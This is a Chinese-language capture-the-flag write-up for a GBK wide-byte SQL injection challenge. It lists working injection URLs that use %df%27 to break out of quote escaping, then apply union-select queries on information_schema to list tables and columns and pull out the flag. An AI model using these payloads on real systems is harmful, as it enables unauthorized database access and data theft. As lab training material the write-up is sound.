题目地址:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

题目内容:

your sql:select id,title from news where id = '1'
Hello World!OVO

宽字节注入详解:

http://www.91ri.org/8611.html

遍历id

id=2 gbk_sql_injection
id=3 the fourth table

由提示可以知道宽字节注入.

确定id,当order by 3时报错.

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+order+by+3%23

拿数据库名sae-chinalover

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,database()%23

遍历表名 ctf,ctf2,ctf3,ctf4,news ,这里table_schema后面不能直接跟数据库名,可以用database()或16进制数代替.

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=0x7361652d6368696e616c6f766572%23

id=3时提示第四个表,即ctf4.
遍历字段名 id,flag ,与上面一样无法直接用表名,需要用16进制数代替.

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x63746634%23

拿到flag

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27+union+select+1,flag+from+ctf4%23

nctf{gbk_3sqli}